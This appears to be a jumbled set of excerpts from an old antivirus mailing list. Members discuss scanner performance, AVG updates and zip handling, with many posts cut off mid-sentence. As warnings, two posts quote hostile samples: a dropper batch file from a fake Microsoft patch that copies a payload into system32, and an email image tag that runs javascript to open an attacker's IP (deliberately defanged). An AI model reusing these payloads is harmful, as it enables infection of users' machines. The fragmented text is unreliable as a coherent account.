I've just received a fake microsoft email with a 744kb patch attached.
It was not detected by my Norton, not by F-Prot, nor AVG or McAffee.
In this patch it has a start batch file which does this:
@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab
Just for your information:
We received a couple of Spam emails (fake ebay notifications) with the
following dangerous tag in the body:
img dynsrc=javascript:window.open('http://68.192.132.122_:8067/')
(I added the _ at the end so it doesn't harm anyone)
As soon as you open the email, the window
AVG takes about 4 seconds to fire up the AV Engine and scan. I'm running the
16bit version 6 of AVG.
I would recommend you to use McAfee. I use version 4.32 for more than a year
now and it is as fast as F-Prot.
Also it was the first and only AV scanner for several days who was able to
detect
the same happens here with f-prot for dos:
14:57:39.69 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for
Queue\1730292.msg
14:57:40.64 4 EXTFILTER(ANTIVIRUS) inp(97): * Found the W32/[EMAIL PROTECTED]
virus !!! in Queue\1730292.msg MCAFEE.
14:57:41.36 4 EXTFILTER(ANTIVIRUS) inp(54): * Message
MyAV scanners are running a bit slower than
yoursbecause the server is not very new and fancy and we do not have that
much traffic:
PIII 666
256MB Ram
IDE Raid1 withold 2x30GB HD (2-3years
old)
I guess with Raid10, new HD, dual P4 and more ram
this would speed it up10x.
Anyway, the
Please read the old posts about this problem.
Short Summary:
Antivirus programs and declude can't open password protected zip files
(F-Prot, McAfee, AVG) unless they try to find a password within the email
and use this to unlock the zip file (Kapersky). Some Virus scanners block
password
Has anyone an AVG V6.0 update script that can be
run as a batch file?
There is a V7.0 batch
fileavailablewhich doesn't work for version 6.0 .
I would like to updateAVG V6.0 several times
a day. The built-in updater and scheduler is crap and doesn't work when you are
not logged in. Also it
go to http://www.declude.com/virus/manual.htm to get the latest update.
Cheers
Adrian
-
ToadShow Pty Ltd
phone: 07 3004 7900
fax: 07 3846 1220
email: [EMAIL PROTECTED]
http://www.toadshow.com.au
-
, 2004 2:44 PM
Subject: Re: [Declude.Virus] AVG V6 much slower than FProt and McAfee
Currently only the 16-bit version works with Declude, the 32-bit version
will soon. 16-bit apps have a big performance hit because they run under
NTVDM.
Matt
Adrian Hauri wrote:
I just installed AVG 6.0 free
